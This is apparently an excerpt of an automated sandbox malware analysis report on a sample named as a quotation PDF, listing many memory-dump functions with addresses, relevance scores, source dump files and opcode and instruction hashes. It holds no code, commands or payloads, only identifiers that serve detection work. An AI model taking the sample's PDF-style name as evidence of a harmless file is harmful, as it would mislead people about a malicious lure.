Opcode Fuzzy Hash: 5a7996acc5891794c938ac58c7430be42068ddde3369be4fd299974e98d5ddde
Instruction Fuzzy Hash: E511A2B1B0E51E8FDBA4DF1498A46A8B7B1EF86310F1111FAD04DD7295DB782B80CB04

Function 00007FFD9B96350E Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a11e4074b845202cee82cbd29f896b8340476463381d44b0e7e2eeff187ee53
Instruction ID: 49f8befbdd5dc670c20812b4f4044440a9c984faa68f602f0f7257aaf3a28651
Opcode Fuzzy Hash: 9a11e4074b845202cee82cbd29f896b8340476463381d44b0e7e2eeff187ee53
Instruction Fuzzy Hash: E011B9B5E1E54DDEEB64DBAC841A3AA77B1FF58340F50017AC04D931A1DB386A868B80

Function 00007FFD9B80C755 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540f53f0e215709066f5d2f753678e6e1d36e28bf7a5235a616e962ab59a2110
Instruction ID: fd1c04c4fcb9504e5073ecb2402be2cfcc34ed8699d780b43aa708b0afa8de33
Opcode Fuzzy Hash: 540f53f0e215709066f5d2f753678e6e1d36e28bf7a5235a616e962ab59a2110
Instruction Fuzzy Hash: 71115E3190994E9FDB45EF58D8A9AEE7BF0FF68309F140566E419C71A2DB30A544CB80

Function 00007FFD9B963545 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e305ab32b651626357da6cb315f697a3911fa6cee8ff1aa788f54536e2ee7d2
Instruction ID: 14ab889b34a884b060d24be6ba5fedf721da00d28a64a0c46a7310cee1b8fd55
Opcode Fuzzy Hash: 4e305ab32b651626357da6cb315f697a3911fa6cee8ff1aa788f54536e2ee7d2
Instruction Fuzzy Hash: 23113DB1E1961E9EEBA4DA5C84593AA77B1FB68340F10017AC00CD32A0DB386A818B80

Function 00007FFD9BA09CB9 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4534dba73f6a3a577d40a13d28e46513167308db38bb431687a0958c20ac038
Instruction ID: 3d2c9dedc0a4d6e616f8c35e04271f5324fc06ed7c23f8b57da0df703932b94e
Opcode Fuzzy Hash: c4534dba73f6a3a577d40a13d28e46513167308db38bb431687a0958c20ac038
Instruction Fuzzy Hash: CD012B11B1EF890FD7A5A77C60648F6B7E1DF9521070546FBD04AC71DFDC2899458340

Function 00007FFD9BA1A229 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61064b3dc0f30d4bbb1f7afcecad27a91d9fa3dcfbcc886d8616e1a574ba547
Instruction ID: f0825526d10dc83ca930e45368b28d7f5f01d2b49a31b4856afe790696787a31
Opcode Fuzzy Hash: e61064b3dc0f30d4bbb1f7afcecad27a91d9fa3dcfbcc886d8616e1a574ba547
Instruction Fuzzy Hash: 3C115B30909A4D8FDF95EF68C858AAE7FF0FF69300F0105AAD419C71A1DB75A994CB40

Function 00007FFD9B803073 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 993431d81d4068f2b940caf3aa78f22300963379254a8664e5b887e5d9c7de98
Instruction ID: 98979fdccd45965b4a3ec787832d2071c62a860aedbcf29b02e7454b22956a66
Opcode Fuzzy Hash: 993431d81d4068f2b940caf3aa78f22300963379254a8664e5b887e5d9c7de98
Instruction Fuzzy Hash: 9211E970B0A9498FEBB1DFA494247F837A1EF4D381F2541B6C04EDB39ACA7458414791

Function 00007FFD9BA005E1 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9e7ac6d4e0826ead9d040036cb1efd5bcc9161b7162f80964ec34e635b184c
Instruction ID: cf6d3b3420651fcfc73a7c061cd4a92a63254e322bc7586103c764dc318cca15
Opcode Fuzzy Hash: da9e7ac6d4e0826ead9d040036cb1efd5bcc9161b7162f80964ec34e635b184c
Instruction Fuzzy Hash: CF01286050E7895FE762D73884252F57FD1EF89614F09467ED08CC60B2DDA89BC68386

Function 00007FFD9BA18DB9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40dc77227bd40d83eefc48a557f71eafdd61326e0a2df9bbf0d7917dcaf9dbc1
Instruction ID: 64f02c0bf7b45e9c24986de065213503eeb7e98b95d4e50b16a07ad0c055c421
Opcode Fuzzy Hash: 40dc77227bd40d83eefc48a557f71eafdd61326e0a2df9bbf0d7917dcaf9dbc1
Instruction Fuzzy Hash: B0115E3090968D8FDF95DF58C858AAD7FF0FF28300F0501AAD419C71A1DB749594CB41

Function 00007FFD9B963B9C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae41d96110a50a29fd4c53a8301322ff65ac310be4e91c8c09d811d089a226fd
Instruction ID: c740f2f426f8981fb26007e142f15770021b6083669bc6932b1c44da249f6f60
Opcode Fuzzy Hash: ae41d96110a50a29fd4c53a8301322ff65ac310be4e91c8c09d811d089a226fd
Instruction Fuzzy Hash: 7A11B670E1661ECFDB68DFA4C0A56ED77B2EF58341F510039D409A62A1CB75A941CB90

Function 00007FFD9BA1AAC9 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ffb9c9dbc6fd25531a94ccb32ad0f6c82ffdb257cc902dfcd7856b40bd081a5
Instruction ID: 750af8777f0b226c43366d42d8f1850741ff854c7a8c460d4cc528b750220d90
Opcode Fuzzy Hash: 1ffb9c9dbc6fd25531a94ccb32ad0f6c82ffdb257cc902dfcd7856b40bd081a5
Instruction Fuzzy Hash: 9F11803090968D8FDB95DF68C864ABD3BF0FF25300F0545AAD458C71A2DB74AA54CB81

Function 00007FFD9B80E345 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea2e9731ea23e3afc4f48225e46c5405c96da2b944e9f6cda10ea44937b9b2c
Instruction ID: f2edeeee2379dbab1aaa3638e30355358b049495199c9cc0c23474f88dca5325
Opcode Fuzzy Hash: aea2e9731ea23e3afc4f48225e46c5405c96da2b944e9f6cda10ea44937b9b2c
Instruction Fuzzy Hash: 9401A231D1E68D9FDB549F64C8595ED7BA0FF09341F4600B6E44CC61B2DB38AA54C700

Function 00007FFD9B80DA61 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7bf11f10f9aa50eb2c26316ed52566d1e3535cb69368e408301e2fbf514f06
Instruction ID: 85d46c1d451765639bbd73c1e75fbcc4cbc56510b6a830552bdd006a42bed867
Opcode Fuzzy Hash: ac7bf11f10f9aa50eb2c26316ed52566d1e3535cb69368e408301e2fbf514f06
Instruction Fuzzy Hash: 4C019271E0D25E8EE7219B94C8242FE77B0EF19350F054276C869961B2DF7C271ACB81

Function 00007FFD9B805DF2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f47fd06b8277ba7e9628338f33133918fafc576fb62698b1c705810489a937c
Instruction ID: ac10a6493359b881b588523f9dad8c0572e535cf83ece39b13fa851f8305aeda
Opcode Fuzzy Hash: 7f47fd06b8277ba7e9628338f33133918fafc576fb62698b1c705810489a937c
Instruction Fuzzy Hash: 5E015A35A0854D9FDB90EFA8D898AED37A0FF08309F5441A6E41DC62A6EA34A594CB40

Function 00007FFD9B803012 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439df18c26a925ad6122e8e8c54b2c1df2375450c8e75d4ad66ee7a5430f2476
Instruction ID: b436cdb5d33046c63dd048fea4ee3fa409b79cc992f50d7ad6b61b7c415fe73c
Opcode Fuzzy Hash: 439df18c26a925ad6122e8e8c54b2c1df2375450c8e75d4ad66ee7a5430f2476
Instruction Fuzzy Hash: D6F090A370BC490FE7E9AA2C60693A827C2EFEC2A17060369A08DD3356DF249C024340

Function 00007FFD9BA07BB0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71419bdfac9745b3a5a69265d209f8081c1c5d4a7d31c49be3196e11ec5bb99a
Instruction ID: 298d07637fc4798c818d48a6067153e1afc8119af6c9bd15c0e6ab4ef7351e98
Opcode Fuzzy Hash: 71419bdfac9745b3a5a69265d209f8081c1c5d4a7d31c49be3196e11ec5bb99a
Instruction Fuzzy Hash: 15F0B411F29D4D0AD7A8B27D6058DFBA1D2DBD8220B114ABAD01FC32DEDC78A9458340

Function 00007FFD9BA19A99 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e59743f574eb13ddd71353447eff524bca6f4c6d7078f73b50f7dfb257e3ebb5
Instruction ID: dbe754d77c5d9bc9f0ca02c3b80c039673064c4c86ccf02c70609aae2cf03da4
Opcode Fuzzy Hash: e59743f574eb13ddd71353447eff524bca6f4c6d7078f73b50f7dfb257e3ebb5
Instruction Fuzzy Hash: 1001D13190A68C8FDB95DF64C868AE83FB0FF19300F0500AAD40CC71E2DB35A98ACB41

Function 00007FFD9BA0BF88 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21da6875f748e3d0c0d790ba31f0d7187f7a9eeb6c22819377457f22940bbf9
Instruction ID: ed556726ebe88a93f140555ae4be26def0128176b2c2ed7adde26cb652cae9b1
Opcode Fuzzy Hash: e21da6875f748e3d0c0d790ba31f0d7187f7a9eeb6c22819377457f22940bbf9
Instruction Fuzzy Hash: 19F0F063F0FA590FE7B8466C18B106426D1DB99A50B0544BFE0ACC72E6DC95A8868740

Function 00007FFD9BA1A240 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df99ccd4a621fbf63a8962d984cc0974c42012bea2958bceaad6581d1bb3dd0a
Instruction ID: 44dd29c8fbf9dcba50c2c4f836aa38a1e92af80558d6ac8ee9cf431bb7bf9086
Opcode Fuzzy Hash: df99ccd4a621fbf63a8962d984cc0974c42012bea2958bceaad6581d1bb3dd0a
Instruction Fuzzy Hash: 0D01A83091991E8FDF94EF58C858AAE77F0FB68305F10056AD81DD3260DB71A694CB80

Function 00007FFD9B963650 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065babb4c47b6f25336eb94ab491b42b4c59a07beb77bc857883000d42e45494
Instruction ID: 35521ea23be509c3f445f98b3b83f9cd44a524b3bc79149ce263642df8b5045a
Opcode Fuzzy Hash: 065babb4c47b6f25336eb94ab491b42b4c59a07beb77bc857883000d42e45494
Instruction Fuzzy Hash: DA0121B1E2960EDFEFA4DF9884563EA77B1FB68340F510479C40D932A0DB345A858B80

Function 00007FFD9B9636A6 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d1cb1969569527ced33cf63415a030d90e96ce9a33d179475417465fb1e9c9
Instruction ID: f34e698924a4a6395bb84995cfc6ab4029a1fdfa7b2776b96a2b6bc259f6fac9
Opcode Fuzzy Hash: c9d1cb1969569527ced33cf63415a030d90e96ce9a33d179475417465fb1e9c9
Instruction Fuzzy Hash: 2A01EC74E2550ECEDB68DFA8C4667EA77B1FF58340F510479D40DA22A1CB346A81CB90

Function 00007FFD9B80679D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7d69527546392c63c6a70a537513767ba96a33fa63f0b1c975abf77860e2d6d
Instruction ID: 5a535eae5334135297d5c2f2438ad01c6a6d55553e33832f6438272010d48651
Opcode Fuzzy Hash: c7d69527546392c63c6a70a537513767ba96a33fa63f0b1c975abf77860e2d6d
Instruction Fuzzy Hash: FFF09A31A1EA4DCFDB60EF58C884AED33A0FF48304F0005A2F00CD7160D634AA14CB01

Function 00007FFD9BA0D79C Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed6ae0a4583fdf485fe5edee921155d044eaf68ae00eaf998d318489c0ce5ad
Instruction ID: 25a81459968bae2f17384a4ed2db8790fc43ba1f95a6f78e4e28d1a4c08d7412
Opcode Fuzzy Hash: 1ed6ae0a4583fdf485fe5edee921155d044eaf68ae00eaf998d318489c0ce5ad
Instruction Fuzzy Hash: 68E0D8B3B4D20F1EF2685A5C78571B8B3C0DB46270F80017BCCCA825A2FC5A3A5302C5

Function 00007FFD9B8061B0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c0118a71f9e14f289af9dc263ea0c433d88ac1ebfa7792c00c6f17a24cd13e
Instruction ID: f426deef9e5b28f6d1a5612a263c973a359059c4171c8e263c791beca1024b3e
Opcode Fuzzy Hash: 30c0118a71f9e14f289af9dc263ea0c433d88ac1ebfa7792c00c6f17a24cd13e
Instruction Fuzzy Hash: 3BF0F83091590E9FDB94EF6898896EE7BE0FF18304F410466E81CD21A4DA70A6A4CB81

Function 00007FFD9B802BC3 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a556e3ef3751159bf668afe7408d7b48558ab0c9ea774960c3b9f85d51d952
Instruction ID: bcebf99dde55bb4a9b297e157baa0e435f6217d46c92bb2a845803d2d72eec54
Opcode Fuzzy Hash: c0a556e3ef3751159bf668afe7408d7b48558ab0c9ea774960c3b9f85d51d952
Instruction Fuzzy Hash: 1EF0E532D185194FD729AF58E8A0AD833A0FB19310F16017AD88AD72D7ED2859418680

Function 00007FFD9BA15A40 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c18e8bd464e86e945120dfa6532d37a0c26aadf1fabc797771394f837ce9648
Instruction ID: c7bac9257a585780cf7acdf57f41e8facd2d02b8a2fb6bde96f05e6484436d89
Opcode Fuzzy Hash: 2c18e8bd464e86e945120dfa6532d37a0c26aadf1fabc797771394f837ce9648
Instruction Fuzzy Hash: 12E02630B1AB094EE7B453BD684C772A7C0EB9C325F41453BD04CC32A0E9AC98818B40

Function 00007FFD9B810FE5 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5783e5da336113fe1c32b4b7ab0b0fe3c8477f6a905cc7c9a0317102978e32
Instruction ID: 6fb84e1cbd6d26d5eb91c4a119f367b2196ca18c0f11d700cb73c4b7e210dc2b
Opcode Fuzzy Hash: 2a5783e5da336113fe1c32b4b7ab0b0fe3c8477f6a905cc7c9a0317102978e32
Instruction Fuzzy Hash: 67F0A870E0991D8ADBA4DB44CC547E8B3B1FF48341F1140F9C18DA2291CE341EC49F80

Function 00007FFD9BA18A16 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c8d114718292279a60295f87190ab15618f6e0b3b89dd8c6ef26645593a23dd
Instruction ID: ebb609df79b15aa57b0779d6338c98c983fb12bd3897a3ee3e4e6292eb248732
Opcode Fuzzy Hash: 5c8d114718292279a60295f87190ab15618f6e0b3b89dd8c6ef26645593a23dd
Instruction Fuzzy Hash: 75E0C231B0980C8FAB84AB8C78522FDB3D1EBCC2317824132E00DC3152CD2568110381

Function 00007FFD9BA13C6E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2e8247e10cb3555158b434df468dd8ebd96d2871ccf07a6fc9e208132c599e
Instruction ID: 051f30ea0cf9e1d921335fdbfbfe53b660c8bdfbff472829d0a9e30e0a829ba7
Opcode Fuzzy Hash: 7f2e8247e10cb3555158b434df468dd8ebd96d2871ccf07a6fc9e208132c599e
Instruction Fuzzy Hash: 17D01200F1E81E06D96C73BC24251FD51C2DBCA610B915475D04DC229ADC9D5D431381

Function 00007FFD9B96314D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2338487089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2d9c35442aab4cb140ac42469d90c3d0baec6d10aef8300b3933d8a4173bb2
Instruction ID: ad3c51b402bf0f289cc5d3d361d274363f6c2eb6b909c01d80dfb6b0b2efbc85
Opcode Fuzzy Hash: 4e2d9c35442aab4cb140ac42469d90c3d0baec6d10aef8300b3933d8a4173bb2
Instruction Fuzzy Hash: 1FF037B1E2A10EDEDF68CFA880163FE77B1FB58340F510539C008921A0C73856818A80

Function 00007FFD9B8008F5 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f381de12e32350e4797bb0ee1163e67edec1645a1f36045d82121fce7bcc40de
Instruction ID: 9ef10e373d85c5db2a87cc5defde2e18170980880546319cd7f88f23008957e2
Opcode Fuzzy Hash: f381de12e32350e4797bb0ee1163e67edec1645a1f36045d82121fce7bcc40de
Instruction Fuzzy Hash: AAD0C26285E6CC0FD733536408600D4BF20FE06240B4A01E7D0D88A0A3E80906288342

Function 00007FFD9BA16CF8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83de8f01e4b766a09009d5069d3fd5d537aa963d64e35bc9192c87a169c39f99
Instruction ID: 29065df4192f1485b882314a60383cccf237de629709bed1f61fc8d27f0ba936
Opcode Fuzzy Hash: 83de8f01e4b766a09009d5069d3fd5d537aa963d64e35bc9192c87a169c39f99
Instruction Fuzzy Hash: 7ED05B22F1FD5E0AEAF4539D29711A455C4DB44260F4515B5E818C51E5E98DAA8042D1

Function 00007FFD9B80F823 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea87032333b60f49da405f750e967065dbfcfdebb9ac3244c70a5a87fea9248
Instruction ID: 0fc1c0f6d7b4dc11d0f86fd783836accbe7ea7bdc615e284093e8ac17a9bc0a3
Opcode Fuzzy Hash: 6ea87032333b60f49da405f750e967065dbfcfdebb9ac3244c70a5a87fea9248
Instruction Fuzzy Hash: 35D05E70E56C5F8AE734EB54C8246F97362AF88341F0140F4C18DE32A5CD382A849F00

Function 00007FFD9B8008D8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2337360821.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b800000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b02cb90ba80e2c711178afe1ced85e12884fbfaabd1bf531a7efee60c603ba6
Instruction ID: aa263513d76204c652255339514ffaad679acf92494f19c114e3199b544fa137
Opcode Fuzzy Hash: 7b02cb90ba80e2c711178afe1ced85e12884fbfaabd1bf531a7efee60c603ba6
Instruction Fuzzy Hash: 2AC02B00C2EA4E05CB04777A04550D03A80BF4C04CFC401B4DCCCC9242DA0C02890337

Function 00007FFD9BA1CC5E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2339022414.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba00000_QUOTATION_OCTQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072d4c428b705033a2bc7d57a7506783bb14b12589bb47895729aad4c9caf026
Instruction ID: 47e724ce62acea3663fcc7cb8ff9b06af65539bc624f28149784855c5395f014
Opcode Fuzzy Hash: 072d4c428b705033a2bc7d57a7506783bb14b12589bb47895729aad4c9caf026
